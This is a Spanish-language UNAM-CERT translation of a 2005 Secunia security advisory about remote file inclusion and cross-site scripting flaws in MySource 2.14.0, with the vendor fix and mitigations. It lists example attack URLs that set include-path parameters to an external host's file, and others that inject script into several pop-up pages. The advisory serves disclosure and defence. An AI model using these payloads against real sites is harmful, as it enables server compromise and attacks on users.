Se reportarón varias vulnerabilidades en MySource, que pueden explotarse para realizar ataques de Cross-site Scripting y comprometer un sistema vulnerable.
Secunia Research
2005-51
MySource | <= | 2.14.0 |
Secunia Research reportó varias vulnerabilidades en MySource, que pueden explotarse por personas maliciosas para realizar ataques de Cross-site Scripting y comprometer un sistema vulnerable.
Una de las entradas no es verificada apropiadamente antes de utilizarse para incluir archivos. Esto puede explotarse para agregar archivos arbitrarios desde fuentes internas o externas.
Ejemplos:
http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php-INCLUDE_PATH=http://[host]/[file]- http://[victim]/web/edit/upgrade_functions/new_upgrade_functions.php-SQUIZLIB_PATH=http://[host]/[file]- http://[victim]/web/init_mysource.php-INCLUDE_PATH=http://[host]/[file]- http://[victim]/pear/Net_Socket/Socket.php-PEAR_PATH=http://[host]/[file]- http://[victim]/pear/HTTP_Request/Request.php-PEAR_PATH=http://[host]/[file]- http://[victim]/pear/Mail/Mail.php-PEAR_PATH=http://[host]/[file]- http://[victim]/pear/Date/Date.php-PEAR_PATH=http://[host]/[file]- http://[victim]/pear/Date/Date/Span.php-PEAR_PATH=http://[host]/[file]- http://[victim]/pear/Mail_Mime/mimeDecode.php-PEAR_PATH=http://[host]/[file]- http://[victim]/pear/Mail_Mime/mime.php-PEAR_PATH=http://[host]/[file]-
Una explotación exitosa requiere que "register_globals" este habilitado y que los scripts afectados sean accesibles y esten colocados dentro del directorio raiz de Web.
Una entrada no es verificada adecuadamente antes de regresarse al usuario. Esto puede explotarse para ejecutar código HMTL y scripts en el navegador de un usuario dentro del contexto de un sitio afectado.
Ejemplos:
http://[victim]/web/edit/upgrade_in_progress_backend.php-target_url=">[code] http://[victim]/squizlib/bodycopy/pop_ups/insert_table.php-bgcolor=[code] http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_props.php-bgcolor=[code] http://[victim]/squizlib/bodycopy/pop_ups/header.php-bgcolor=[code] http://[victim]/squizlib/bodycopy/pop_ups/edit_table_row_props.php-bgcolor=[code] http://[victim]/squizlib/bodycopy/pop_ups/edit_table_props.php-bgcolor=[code] http://[victim]/squizlib/bodycopy/pop_ups/edit_table_cell_type_wysiwyg.php-stylesheet=">[code]
Una explotación exitosa requiere que "register_globals" este habilitado y que los scripts afectados sean accesibles y esten colocados dentro del directorio raiz de Web.
Las vulnerabilidades fueron confirmadas en la versión 2.14.0. Versiones anteriores también podrían ser afectadas.
Cross-site Scripting
Acceso al sistema.
El vendedor corrigió las vulnerabilidades en la versión 2.14.2 avisando al usuario durante la instalación del riesgo de seguridad que representa colocar los scripts de MySource en un directorio público y tener habilitado "register_globals".
Los usuarios deben deshabilitar "register_globals" y asegurarse que la instalación de MySource se mueva del directorio raiz de Web.
El proceso de instalación fue actualizado en la versión 2.14.2:
http://mysource.squiz.net/download/downloads/download_2.14.2
Mayor información.
http://secunia.com/secunia_research/2005-51/advisory/La Coordinación de Seguridad de la Información/UNAM-CERT agradece el apoyo en la elaboración ó traducción y revisión de éste Documento a:
UNAM-CERT
Equipo de Respuesta a Incidentes UNAM
Coordinación de Seguridad de la Información
incidentes at seguridad.unam.mx
phishing at seguridad.unam.mx
http://www.cert.org.mx
http://www.seguridad.unam.mx
ftp://ftp.seguridad.unam.mx
Tel: 56 22 81 69
Fax: 56 22 80 47
Aviso legal |
Créditos |
Staff |
Administración
Copyright © Todos los derechos reservados
UNAM - CERT